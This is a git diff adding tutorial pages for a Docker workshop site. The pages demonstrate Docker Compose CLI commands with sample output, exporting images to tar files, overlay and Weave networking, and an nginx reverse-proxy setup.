"Docker-Compose-CLI-Exec-Command" +--- + +### Docker Compose Exec into result service + + +```sh + +docker compose exec result sh +# ls +Dockerfile docker-compose.test.yml package-lock.json package.json server.js tests views +# cat docker-compose.test.yml +version: '2' + +services: + + sut: + build: ./tests/ + depends_on: + - vote + - result + - worker + networks: + - front-tier + + vote: + build: ../vote/ + ports: ["80"] + depends_on: + - redis + - db + networks: + - front-tier + - back-tier + + result: + build: . + ports: ["80"] + depends_on: + - redis + - db + networks: + - front-tier + - back-tier + + worker: + build: ../worker/ + depends_on: + - redis + - db + networks: + - back-tier + + redis: + image: redis:alpine + networks: + - back-tier + + db: + image: postgres:9.4 + environment: + POSTGRES_USER: "postgres" + POSTGRES_PASSWORD: "postgres" + volumes: + - "db-data:/var/lib/postgresql/data" + networks: + - back-tier + +volumes: + db-data: + +networks: + front-tier: + back-tier: +# exit +➜ example-voting-app git:(main) + + +``` + diff --git a/content/en/docker/a33.docker-compose-images 2.md b/content/en/docker/a33.docker-compose-images 2.md new file mode 100644 index 0000000..f51ec79 --- /dev/null +++ b/content/en/docker/a33.docker-compose-images 2.md @@ -0,0 +1,18 @@ +--- +title: "Docker Compose CLI - Images Command " +description: " List images used by the created containers " +slug: "Docker-Compose-CLI-Images-Command" +--- + +```sh +example-voting-app git:(main) docker compose images +CONTAINER REPOSITORY TAG IMAGE ID SIZE +example-voting-app-db-1 postgres 15-alpine 68d4a8d9d3d9 241MB +example-voting-app-redis-1 redis alpine 1339d05b97a4 30.4MB +example-voting-app-result-1 example-voting-app-result latest 223b94fc00ae 254MB +example-voting-app-vote-1 example-voting-app-vote latest 5c1cf62b540c 135MB +example-voting-app-worker-1 example-voting-app-worker latest 8f82fda1dae8 195MB + +``` + + diff --git a/content/en/docker/a34.docker-compose-kill 2.md b/content/en/docker/a34.docker-compose-kill 2.md new file mode 100644 index 0000000..443e16f --- /dev/null +++ b/content/en/docker/a34.docker-compose-kill 2.md @@ -0,0 +1,18 @@ +--- +title: "Docker Compose CLI - Kill Command " +description: " Force stop service containers. 
" +slug: "Docker-Compose-CLI-Kill-Command" +--- + + + +#### Forces running containers to stop by sending a SIGKILL signal. Optionally the signal can be passed : + +```sh + example-voting-app git:(main) docker-compose kill -s SIGINT +[+] Running 4/0 + β Ώ Container example-voting-app-redis-1 Killed 0.0s + β Ώ Container example-voting-app-worker-1 Killed 0.0s + β Ώ Container example-voting-app-db-1 Killed 0.0s + β Ώ Container example-voting-app-result-1 Killed 0.0s +``` \ No newline at end of file diff --git a/content/en/docker/a35.docker-compose-logs 2.md b/content/en/docker/a35.docker-compose-logs 2.md new file mode 100644 index 0000000..c9ebb3e --- /dev/null +++ b/content/en/docker/a35.docker-compose-logs 2.md @@ -0,0 +1,132 @@ +--- +title: "Docker Compose CLI - logs Command " +description: " View output from containers " +slug: "Docker-Compose-CLI-Logs-Command" +--- + + + +#### View output from containers + + +```sh + +➜ example-voting-app git:(main) docker-compose logs +example-voting-app-worker-1 | Connected to db +example-voting-app-result-1 | [nodemon] 2.0.21 +example-voting-app-worker-1 | Found redis at 172.20.0.2 +example-voting-app-worker-1 | Connecting to redis +example-voting-app-result-1 | [nodemon] to restart at any time, enter `rs` +example-voting-app-result-1 | [nodemon] watching path(s): *.* +example-voting-app-result-1 | [nodemon] watching extensions: js,mjs,json +example-voting-app-result-1 | [nodemon] starting `node server.js` +example-voting-app-result-1 | Sat, 04 Mar 2023 18:00:16 GMT body-parser deprecated bodyParser: use individual json/urlencoded middlewares at server.js:73:9 +example-voting-app-result-1 | Sat, 04 Mar 2023 18:00:16 GMT body-parser deprecated undefined extended: provide extended option at ../node_modules/body-parser/index.js:104:29 +example-voting-app-result-1 | App running on port 80 +example-voting-app-result-1 | Connected to db +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.311 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.313 # Redis version=7.0.9, bits=64, commit=00000000, modified=0, pid=1, just started +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.313 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.313 * monotonic clock: POSIX clock_gettime +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.314 * Running mode=standalone, port=6379. +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.315 # Server initialized +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.318 * Ready to accept connections +example-voting-app-redis-1 | 1:signal-handler (1677952603) Received SIGINT scheduling shutdown... +example-voting-app-redis-1 | 1:M 04 Mar 2023 17:56:43.159 # User requested shutdown... +example-voting-app-redis-1 | 1:M 04 Mar 2023 17:56:43.159 * Saving the final RDB snapshot before exiting. +example-voting-app-redis-1 | 1:M 04 Mar 2023 17:56:43.161 * DB saved on disk +example-voting-app-redis-1 | 1:M 04 Mar 2023 17:56:43.161 # Redis is now ready to exit, bye bye... +example-voting-app-redis-1 | 1:C 04 Mar 2023 18:00:10.915 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo +example-voting-app-redis-1 | 1:C 04 Mar 2023 18:00:10.915 # Redis version=7.0.9, bits=64, commit=00000000, modified=0, pid=1, just started +example-voting-app-redis-1 | 1:C 04 Mar 2023 18:00:10.915 # Warning: no config file specified, using the default config. 
In order to specify a config file use redis-server /path/to/redis.conf +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.915 * monotonic clock: POSIX clock_gettime +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.916 * Running mode=standalone, port=6379. +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.916 # Server initialized +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * Loading RDB produced by version 7.0.9 +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * RDB age 207 seconds +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * RDB memory usage when created 1.09 Mb +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * Done loading RDB, keys loaded: 0, keys expired: 0. +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * DB loaded from disk: 0.000 seconds +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * Ready to accept connections +example-voting-app-db-1 | The files belonging to this database system will be owned by user "postgres". +example-voting-app-db-1 | This user must also own the server process. +example-voting-app-db-1 | +example-voting-app-db-1 | The database cluster will be initialized with locale "en_US.utf8". +example-voting-app-db-1 | The default database encoding has accordingly been set to "UTF8". +example-voting-app-db-1 | The default text search configuration will be set to "english". +example-voting-app-db-1 | +example-voting-app-db-1 | Data page checksums are disabled. +example-voting-app-db-1 | +example-voting-app-db-1 | fixing permissions on existing directory /var/lib/postgresql/data ... ok +example-voting-app-db-1 | creating subdirectories ... ok +example-voting-app-db-1 | selecting dynamic shared memory implementation ... posix +example-voting-app-db-1 | selecting default max_connections ... 100 +example-voting-app-db-1 | selecting default shared_buffers ... 128MB +example-voting-app-db-1 | selecting default time zone ... UTC +example-voting-app-db-1 | creating configuration files ... ok +example-voting-app-db-1 | running bootstrap script ... ok +example-voting-app-db-1 | sh: locale: not found +example-voting-app-db-1 | 2023-03-04 14:41:27.703 UTC [30] WARNING: no usable system locales were found +example-voting-app-db-1 | performing post-bootstrap initialization ... ok +example-voting-app-db-1 | syncing data to disk ... ok +example-voting-app-db-1 | +example-voting-app-db-1 | +example-voting-app-db-1 | Success. You can now start the database server using: +example-voting-app-db-1 | +example-voting-app-db-1 | pg_ctl -D /var/lib/postgresql/data -l logfile start +example-voting-app-db-1 | +example-voting-app-db-1 | initdb: warning: enabling "trust" authentication for local connections +example-voting-app-db-1 | initdb: hint: You can change this by editing pg_hba.conf or using the option -A, or --auth-local and --auth-host, the next time you run initdb. 
+example-voting-app-db-1 | waiting for server to start....2023-03-04 14:41:28.118 UTC [36] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +example-voting-app-db-1 | 2023-03-04 14:41:28.120 UTC [36] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +example-voting-app-db-1 | 2023-03-04 14:41:28.124 UTC [39] LOG: database system was shut down at 2023-03-04 14:41:28 UTC +example-voting-app-db-1 | 2023-03-04 14:41:28.127 UTC [36] LOG: database system is ready to accept connections +example-voting-app-db-1 | done +example-voting-app-db-1 | server started +example-voting-app-db-1 | +example-voting-app-db-1 | /usr/local/bin/docker-entrypoint.sh: ignoring /docker-entrypoint-initdb.d/* +example-voting-app-db-1 | +example-voting-app-db-1 | waiting for server to shut down....2023-03-04 14:41:28.218 UTC [36] LOG: received fast shutdown request +example-voting-app-db-1 | 2023-03-04 14:41:28.220 UTC [36] LOG: aborting any active transactions +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [36] LOG: background worker "logical replication launcher" (PID 42) exited with exit code 1 +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [37] LOG: shutting down +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [37] LOG: checkpoint starting: shutdown immediate +example-voting-app-db-1 | 2023-03-04 14:41:28.227 UTC [37] LOG: checkpoint complete: wrote 3 buffers (0.0%); 0 WAL file(s) added, 0 removed, 0 recycled; write=0.002 s, sync=0.001 s, total=0.005 s; sync files=2, longest=0.001 s, average=0.001 s; distance=0 kB, estimate=0 kB +example-voting-app-db-1 | 2023-03-04 14:41:28.233 UTC [36] LOG: database system is shut down +example-voting-app-db-1 | done +example-voting-app-db-1 | server stopped +example-voting-app-db-1 | +example-voting-app-db-1 | PostgreSQL init process complete; ready for start up. 
+example-voting-app-db-1 | +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: listening on IPv4 address "0.0.0.0", port 5432 +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: listening on IPv6 address "::", port 5432 +example-voting-app-db-1 | 2023-03-04 14:41:28.344 UTC [1] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +example-voting-app-db-1 | 2023-03-04 14:41:28.347 UTC [50] LOG: database system was shut down at 2023-03-04 14:41:28 UTC +example-voting-app-db-1 | 2023-03-04 14:41:28.351 UTC [1] LOG: database system is ready to accept connections +example-voting-app-db-1 | 2023-03-04 14:46:28.434 UTC [48] LOG: checkpoint starting: time +example-voting-app-db-1 | 2023-03-04 14:46:36.189 UTC [48] LOG: checkpoint complete: wrote 79 buffers (0.5%); 0 WAL file(s) added, 0 removed, 0 recycled; write=7.707 s, sync=0.027 s, total=7.755 s; sync files=41, longest=0.012 s, average=0.001 s; distance=397 kB, estimate=397 kB +example-voting-app-db-1 | 2023-03-04 17:56:43.105 UTC [1] LOG: received fast shutdown request +example-voting-app-db-1 | 2023-03-04 17:56:43.107 UTC [1] LOG: aborting any active transactions +example-voting-app-db-1 | 2023-03-04 17:56:43.111 UTC [67] FATAL: terminating connection due to administrator command +example-voting-app-db-1 | 2023-03-04 17:56:43.117 UTC [66] FATAL: terminating connection due to administrator command +example-voting-app-db-1 | 2023-03-04 17:56:43.122 UTC [1] LOG: background worker "logical replication launcher" (PID 53) exited with exit code 1 +example-voting-app-db-1 | 2023-03-04 17:56:43.126 UTC [48] LOG: shutting down +example-voting-app-db-1 | 2023-03-04 17:56:43.128 UTC [48] LOG: checkpoint starting: shutdown immediate +example-voting-app-db-1 | 2023-03-04 17:56:43.138 UTC [48] LOG: checkpoint complete: wrote 0 buffers (0.0%); 0 WAL file(s) added, 0 removed, 0 recycled; write=0.003 s, sync=0.001 s, total=0.012 s; sync files=0, longest=0.000 s, average=0.000 s; distance=0 kB, estimate=357 kB +example-voting-app-db-1 | 2023-03-04 17:56:43.185 UTC [1] LOG: database system is shut down +example-voting-app-db-1 | +example-voting-app-db-1 | PostgreSQL Database directory appears to contain a database; Skipping initialization +example-voting-app-db-1 | +example-voting-app-db-1 | 2023-03-04 18:00:10.972 UTC [1] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +example-voting-app-db-1 | 2023-03-04 18:00:10.972 UTC [1] LOG: listening on IPv4 address "0.0.0.0", port 5432 +example-voting-app-db-1 | 2023-03-04 18:00:10.972 UTC [1] LOG: listening on IPv6 address "::", port 5432 +example-voting-app-db-1 | 2023-03-04 18:00:10.973 UTC [1] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +example-voting-app-db-1 | 2023-03-04 18:00:10.977 UTC [24] LOG: database system was shut down at 2023-03-04 17:56:43 UTC +example-voting-app-db-1 | 2023-03-04 18:00:10.982 UTC [1] LOG: database system is ready to accept connections +➜ example-voting-app git:(main) + + + + +``` \ No newline at end of file diff --git a/content/en/docker/a36.docker-compose-ls 2.md b/content/en/docker/a36.docker-compose-ls 2.md new file mode 100644 index 0000000..c1b9bd8 --- /dev/null +++ b/content/en/docker/a36.docker-compose-ls 2.md @@ -0,0 +1,17 @@ +--- +title: "Docker 
Compose CLI - ls Command" +description: " List running compose projects " +slug: "Docker-Compose-CLI-ls-Command" +--- + + + +#### List running compose projects + + +```sh +docker-compose ls +NAME STATUS CONFIG FILES +example-voting-app running(4) /Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/docker-compose.yml +➜ example-voting-app git:(main) +``` \ No newline at end of file diff --git a/content/en/docker/a37.docker-compose-pause 2.md b/content/en/docker/a37.docker-compose-pause 2.md new file mode 100644 index 0000000..cd2e4e9 --- /dev/null +++ b/content/en/docker/a37.docker-compose-pause 2.md @@ -0,0 +1,31 @@ +--- +title: "Docker Compose CLI - Pause unpause Command " +description: " Pause services " +slug: "Docker-Compose-CLI-Pause-unpause-Command" +--- + +```sh + example-voting-app git:(main) docker compose pause +[+] Running 4/0 + β Ώ Container example-voting-app-db-1 Paused 0.0s + β Ώ Container example-voting-app-redis-1 Paused 0.0s + β Ώ Container example-voting-app-worker-1 Paused 0.0s + β Ώ Container example-voting-app-result-1 Paused 0.0s +➜ example-voting-app git:(main) +``` + + +#### Pauses running containers of a service. They can be unpaused with docker compose unpause. + +```sh +docker compose unpause +[+] Running 4/0 + β Ώ Container example-voting-app-worker-1 Unpaused 0.0s + β Ώ Container example-voting-app-redis-1 Unpaused 0.0s + β Ώ Container example-voting-app-result-1 Unpaused 0.0s + β Ώ Container example-voting-app-db-1 Unpaused 0.0s +➜ example-voting-app git:(main) + +``` + + diff --git a/content/en/docker/a38.docker-compose-port 2.md b/content/en/docker/a38.docker-compose-port 2.md new file mode 100644 index 0000000..5500f73 --- /dev/null +++ b/content/en/docker/a38.docker-compose-port 2.md @@ -0,0 +1,16 @@ +--- +title: "Docker Compose CLI - Port Command " +description: " Print the public port for a port binding." +slug: "Docker-Compose-CLI-Port-Command" +--- + +#### Print the public port for a port binding. 
+ +```sh +docker compose port result 80 +0.0.0.0:5001 +➜ example-voting-app git:(main) + +``` + + diff --git a/content/en/docker/a39.docker-compose-ps 2.md b/content/en/docker/a39.docker-compose-ps 2.md new file mode 100644 index 0000000..c3b61dc --- /dev/null +++ b/content/en/docker/a39.docker-compose-ps 2.md @@ -0,0 +1,18 @@ +--- +title: "Docker Compose CLI - ps Command " +description: " List containers " +slug: "Docker-Compose-CLI-ps-Command" +--- + +#### List containers + +```sh + docker compose ps +NAME IMAGE COMMAND SERVICE CREATED STATUS PORTS +example-voting-app-db-1 postgres:15-alpine "docker-entrypoint.s…" db 4 hours ago Up About an hour (healthy) 5432/tcp +example-voting-app-redis-1 redis:alpine "docker-entrypoint.s…" redis 4 hours ago Up About an hour (healthy) 6379/tcp +example-voting-app-result-1 example-voting-app-result "nodemon server.js" result About an hour ago Up About an hour 0.0.0.0:5858->5858/tcp, 0.0.0.0:5001->80/tcp +example-voting-app-worker-1 example-voting-app-worker "dotnet Worker.dll" worker About an hour ago Up About an hour +➜ example-voting-app git:(main) + +```` diff --git a/content/en/docker/a4.tarfile 2.md b/content/en/docker/a4.tarfile 2.md new file mode 100644 index 0000000..f3784bb --- /dev/null +++ b/content/en/docker/a4.tarfile 2.md @@ -0,0 +1,68 @@ +--- +title: "Images and Container As Tar file" +slug: Images-and-Container-As-Tar-file +--- + +#### Images and Container as Tarfile + +Docker provides the ability to save images and containers as tar files, which can be useful for sharing with others or transferring between systems. Here's how to do it: + + +```sh +docker pull nginx:latest +latest: Pulling from library/nginx +5731adb3a4ab: Pull complete +8785c8f663d3: Pull complete +023b6bd393e4: Pull complete +fd8f86b165b0: Pull complete +8f41e7c12976: Pull complete +3b5338ea7d08: Pull complete +Digest: sha256:6650513efd1d27c1f8a5351cbd33edf85cc7e0d9d0fcb4ffb23d8fa89b601ba8 +Status: Downloaded newer image for nginx:latest +docker.io/library/nginx:latest + +``` + +#### Saving an Image as a Tar File + +To save a Docker image as a tar file, use the docker save command with the image name and output file name: + +```sh +dockerworkshop git:(main) βœ— docker container run -it ubuntu:14.04 bash +Unable to find image 'ubuntu:14.04' locally +14.04: Pulling from library/ubuntu +d1a5a1e51f25: Pull complete +75f8eea31a63: Pull complete +a72d031efbfb: Pull complete +Digest: sha256:64483f3496c1373bfd55348e88694d1c4d0c9b660dee6bfef5e12f43b9933b30 +Status: Downloaded newer image for ubuntu:14.04 +root@906d9f72e9fe:/# exit +exit + +``` + +```sh +➜ dockerworkshop git:(main) βœ— docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +1bf183201392 ubuntu:14.04 "bash" 15 seconds ago Up 14 seconds loving_ride +``` + +```sh +docker export 1b > os.tar +docker export loving_ride > os1.tar +dockerworkshop git:(main) βœ— ls +os.tar os1.tar +``` + + +docker load is a command used to load images or container archives that were previously saved using the docker save command. + +When you use the docker save command, it creates a tar archive of one or more Docker images and/or containers. You can then use the docker load command to load this tar archive back into Docker. 
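+Note that the tar files created above with `docker export` are a different case: they contain a flattened container filesystem and are brought back in with `docker import`, not `docker load` (image history, layers and tags are not preserved). A minimal sketch, where the image name `myubuntu:exported` is just an example:
+
+```sh
+# Re-import a container filesystem tar as a new single-layer image
+docker import os.tar myubuntu:exported
+# Confirm the imported image is listed
+docker images myubuntu
+```
+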
+ +The syntax for using the docker load command is as follows: + +```sh +➜ dockerworkshop git:(main) βœ— docker save -o os.tar ubuntu +➜ dockerworkshop git:(main) βœ— docker load < os.tar +Loaded image: ubuntu:14.04 +``` diff --git a/content/en/docker/a40.docker-compose-pull 2.md b/content/en/docker/a40.docker-compose-pull 2.md new file mode 100644 index 0000000..940e6d1 --- /dev/null +++ b/content/en/docker/a40.docker-compose-pull 2.md @@ -0,0 +1,19 @@ +--- +title: "Docker Compose CLI - pull Command " +description: " Pull service images " +slug: "Docker-Compose-CLI-pull-Command" +--- + +#### Pull service images + + +```sh + example-voting-app git:(main) docker compose pull +[+] Running 5/5 + β Ώ vote Skipped - No image to be pulled 0.0s + β Ώ result Skipped - No image to be pulled 0.0s + β Ώ worker Skipped - No image to be pulled 0.0s + β Ώ redis Pulled 2.8s + β Ώ db Pulled 2.8s + +``` \ No newline at end of file diff --git a/content/en/docker/a41.docker-compose-push 2.md b/content/en/docker/a41.docker-compose-push 2.md new file mode 100644 index 0000000..34cc537 --- /dev/null +++ b/content/en/docker/a41.docker-compose-push 2.md @@ -0,0 +1,22 @@ +--- +title: "Docker Compose CLI - push Command " +description: " Push service images " +slug: "Docker-Compose-CLI-push-Command" +--- + +#### Push service images + + +```sh + +services: + service1: + build: . + image: localhost:5000/yourimage ## goes to local registry + + service2: + build: . + image: your-dockerid/yourimage ## goes to your repository on Docker Hub + +``` + diff --git a/content/en/docker/a42.docker-compose-restart 2.md b/content/en/docker/a42.docker-compose-restart 2.md new file mode 100644 index 0000000..8067444 --- /dev/null +++ b/content/en/docker/a42.docker-compose-restart 2.md @@ -0,0 +1,20 @@ +--- +title: "Docker Compose CLI - restart Command " +description: " restart service images " +slug: "Docker-Compose-CLI-restart-Command" +--- + +#### restart service images + +```sh +docker compose restart +[+] Running 5/5 + β Ώ Container example-voting-app-db-1 Started 0.7s + β Ώ Container example-voting-app-redis-1 Started 0.7s + β Ώ Container example-voting-app-result-1 Started 0.6s + β Ώ Container example-voting-app-vote-1 Started 0.5s + β Ώ Container example-voting-app-worker-1 Started 0.4s +➜ example-voting-app git:(main) +``` + + diff --git a/content/en/docker/a43.docker-compose-rm 2.md b/content/en/docker/a43.docker-compose-rm 2.md new file mode 100644 index 0000000..299bd0e --- /dev/null +++ b/content/en/docker/a43.docker-compose-rm 2.md @@ -0,0 +1,31 @@ +--- +title: "Docker Compose CLI - rm Command " +description: " Removes stopped service containers" +slug: "Docker-Compose-CLI-rm-Command" +--- + + +#### Removes stopped service containers + + +```sh +➜ example-voting-app git:(main) docker compose stop +[+] Running 5/5 + β Ώ Container example-voting-app-vote-1 Stopped 0.3s + β Ώ Container example-voting-app-result-1 Stopped 0.3s + β Ώ Container example-voting-app-worker-1 Stopped 0.1s + β Ώ Container example-voting-app-db-1 Stopped 0.1s + β Ώ Container example-voting-app-redis-1 Stopped 0.2s +➜ example-voting-app git:(main) docker compose rm +? 
Going to remove example-voting-app-vote-1, example-voting-app-result-1, example-voting-app-worker-1, example-voting-app-db-1, example-voting-app-redis-1 Yes +[+] Running 5/0 + β Ώ Container example-voting-app-redis-1 Removed 0.0s + β Ώ Container example-voting-app-vote-1 Removed 0.0s + β Ώ Container example-voting-app-result-1 Removed 0.0s + β Ώ Container example-voting-app-db-1 Removed 0.0s + β Ώ Container example-voting-app-worker-1 Removed 0.0s +➜ example-voting-app git:(main) + + + +``` diff --git a/content/en/docker/a44.docker-compose-run 2.md b/content/en/docker/a44.docker-compose-run 2.md new file mode 100644 index 0000000..7540555 --- /dev/null +++ b/content/en/docker/a44.docker-compose-run 2.md @@ -0,0 +1,40 @@ +--- +title: "Docker Compose CLI - run Command " +description: " run service containers" +slug: "Docker-Compose-CLI-run-Command" +--- + + +```sh + +➜ example-voting-app git:(main) docker compose run db + +PostgreSQL Database directory appears to contain a database; Skipping initialization + +2023-03-04 19:16:58.496 UTC [1] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +2023-03-04 19:16:58.496 UTC [1] LOG: listening on IPv4 address "0.0.0.0", port 5432 +2023-03-04 19:16:58.496 UTC [1] LOG: listening on IPv6 address "::", port 5432 +2023-03-04 19:16:58.498 UTC [1] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +2023-03-04 19:16:58.503 UTC [24] LOG: database system was shut down at 2023-03-04 19:15:07 UTC +2023-03-04 19:16:58.510 UTC [1] LOG: database system is ready to accept connections +^C2023-03-04 19:17:11.082 UTC [1] LOG: received fast shutdown request +2023-03-04 19:17:11.088 UTC [1] LOG: aborting any active transactions +2023-03-04 19:17:11.108 UTC [1] LOG: background worker "logical replication launcher" (PID 27) exited with exit code 1 +2023-03-04 19:17:11.108 UTC [22] LOG: shutting down +2023-03-04 19:17:11.110 UTC [22] LOG: checkpoint starting: shutdown immediate +2023-03-04 19:17:11.117 UTC [22] LOG: checkpoint complete: wrote 3 buffers (0.0%); 0 WAL file(s) added, 0 removed, 0 recycled; write=0.003 s, sync=0.001 s, total=0.009 s; sync files=2, longest=0.001 s, average=0.001 s; distance=0 kB, estimate=0 kB +2023-03-04 19:17:11.127 UTC [1] LOG: database system is shut down +➜ example-voting-app git:(main) docker compose run worker +[+] Running 2/2 + β Ώ Container example-voting-app-db-1 Created 0.0s + β Ώ Container example-voting-app-redis-1 Created 0.0s +[+] Running 2/2 + β Ώ Container example-voting-app-db-1 Started 0.5s + β Ώ Container example-voting-app-redis-1 Started 0.5s +Connected to db +Found redis at 172.20.0.3 +Connecting to redis +^C% +➜ example-voting-app git:(main) + +``` \ No newline at end of file diff --git a/content/en/docker/a45.local-network 2.md b/content/en/docker/a45.local-network 2.md new file mode 100644 index 0000000..75d5e2a --- /dev/null +++ b/content/en/docker/a45.local-network 2.md @@ -0,0 +1,70 @@ +--- +title: "Setup local network " +description: " overlay network " +slug: "Setup-local-network" +--- + + +#### Docker network create command syntax + +```sh +docker network create --help +``` +#### view current networks + +```sh +docker network ls +clear +``` + +#### Create a new overlay network, with all default options + +```sh +docker network create -d overlay defaults-over +``` +### Create a new overlay network with specific IP settings + +```sh +docker network create -d overlay \ +--subnet=172.30.0.0/24 \ +--ip-range=172.30.0.0/28 
\ +--gateway=172.30.0.254 \ +specifics-over +``` + +#### view current networks again + +```sh +docker network ls +``` +### Initial validation + +```sh +docker network inspect specifics-over --format '{{json .IPAM.Config}}' | jq +``` +clear + +### Create service tester1 +```sh +docker service create --detach --replicas 3 --name tester1 \ +--network specifics-over alpine tail -f /dev/null +``` + +#### Create service tester2 + +```sh +docker service create --detach --replicas 3 --name tester2 \ +--network specifics-over alpine tail -f /dev/null +``` + +### get the container names + +```sh +docker container ls +``` +#### From a container in the tester1 service ping the tester2 service by name + +```sh +docker container exec -it tester1.3. ping -c 3 tester2 +``` + diff --git a/content/en/docker/a46.remote-network 2.md b/content/en/docker/a46.remote-network 2.md new file mode 100644 index 0000000..6235dca --- /dev/null +++ b/content/en/docker/a46.remote-network 2.md @@ -0,0 +1,59 @@ +--- +title: "Setup Remote network " +description: " weave driver " +slug: "Setup-Remote-network" +--- + +#### Docker network managment command + +```sh +docker network --help +clear +``` + +### Starting on ubuntu-node01: Install and setup the weave driver + +```sh +sudo curl -L git.io/weave -o /usr/local/bin/weave +sudo chmod a+x /usr/local/bin/weave +export CHECKPOINT_DISABLE=1 +weave launch +eval $(weave env) +``` + +clear + +#### Now on ubuntu-node02: Install and setup the weave driver +```sh +sudo curl -L git.io/weave -o /usr/local/bin/weave +sudo chmod a+x /usr/local/bin/weave +export CHECKPOINT_DISABLE=1 +weave launch +eval $(weave env) +``` +clear + +#### Now, back on ubuntu-node01:Bring node02 in as a peer on node01's weave network +```sh +weave connect ubuntu-node02 +``` +#### Starting with ubuntu-node01:Run a container detached on node01 +```sh +docker container run -d --name app01 alpine tail -f /dev/null +``` +#### Now, launch a container on ubuntu-node02: Run a container detached on node02 +```sh +docker container run -d --name app02 alpine tail -f /dev/null +``` +#### Since we are on node02, we will check there first... +#### From inside the app02 container running on node02, +#### let's ping the app01 container running on node01 +```sh +docker container exec -it app02 ping -c 4 app01 +``` +#### Similarly, from inside the app01 container running on node01, +#### let's ping the app02 container running on node02 +```sh +docker container exec -it app01 ping -c 4 app02 +``` +clear diff --git a/content/en/docker/a47.Docker-Compose-Net 2.md b/content/en/docker/a47.Docker-Compose-Net 2.md new file mode 100644 index 0000000..5871a43 --- /dev/null +++ b/content/en/docker/a47.Docker-Compose-Net 2.md @@ -0,0 +1,54 @@ +--- +title: "Newtorking in Docker Compose " +slug: "Newtorking in Docker Compose" +--- + +### creating and using networks in docker-compose.yml + +```yml +version: "3.7" +services: + app1: + image: httpd:latest + container_name: app1 + ports: + - 8080:80 + networks: + - app1_net +networks: + app1_net: + +``` + +### run docker compose up + +```sh +docker-compose up + +``` + +### Open browser + +```sh +http://localhost:8080 +``` + +Observe the output + +### On a second terminal +```sh +docker ps +``` +#### Observe the networking part! 
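+The plain `docker inspect app1` shown below prints a lot of JSON; assuming `jq` is installed (it was used in the earlier network labs), one way to jump straight to the networking section is:
+
+```sh
+# Show only the networks the app1 container is attached to
+docker inspect app1 --format '{{json .NetworkSettings.Networks}}' | jq
+```
+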
+ +```sh +docker inspect app1 + +``` + +### Stops the docker-compose +```sh +docker-compose rm +``` + + diff --git a/content/en/docker/a48.Docker-compose-ngnix-net 2.md b/content/en/docker/a48.Docker-compose-ngnix-net 2.md new file mode 100644 index 0000000..d00cf14 --- /dev/null +++ b/content/en/docker/a48.Docker-compose-ngnix-net 2.md @@ -0,0 +1,84 @@ +--- +title: "Newtorking in Docker Compose with ngnix" +description: " Docker Compose Newtorking " +slug: "Newtorking-in-Docker-Compose-with-ngnix" +--- + + +create docker-compose.yml with following content : + +```yml +version: "3.7" + +services: + web: + image: nginx:alpine + volumes: + - ./nginx.conf:/etc/nginx/nginx.conf + ports: + - 8080:80 + networks: + - app1_net + - app2_net + + app1: + image: httpd:latest + networks: + - app1_net + + app2: + image: httpd:latest + networks: + - app2_net + +networks: + app1_net: + app2_net: + +``` + +#### the following nginx.conf configuration file in the same directory: + +```sh + +events {} +http { + server { + listen 80; + listen [::]:80; + + server_name example.com; + + location / { + proxy_pass http://app1:80/; + } + location /app2 { + proxy_pass http://app2:80/; + } + } +} + + + + +``` + +### run docker compose + +```sh + +docker compose up +``` + +### Go to http://localhost:8080 and observer the command line + + +β€’ It will show you the nignx-container web_1 container (reverse_proxy) was requested
+- And forwarded the request to the "app1" container
+- Reload a few times to make this more obvious
+
+#### Go to http://localhost:8080/app2 and observe the command line
+- It will show again that the nginx web_1 container (the reverse proxy) received the request
+- And this time forwarded it to the "app2" container
+- Reload a few times to make this more obvious (see the terminal check below)
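+To verify the same routing from the terminal instead of the browser, here is a quick sketch using the service names from the compose file above:
+
+```sh
+# Request the default route (proxied to app1) and the /app2 route (proxied to app2)
+curl -s http://localhost:8080/
+curl -s http://localhost:8080/app2
+# The httpd containers log the requests they serve, so this shows which backend handled what
+docker compose logs --tail=20 app1 app2
+```
+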
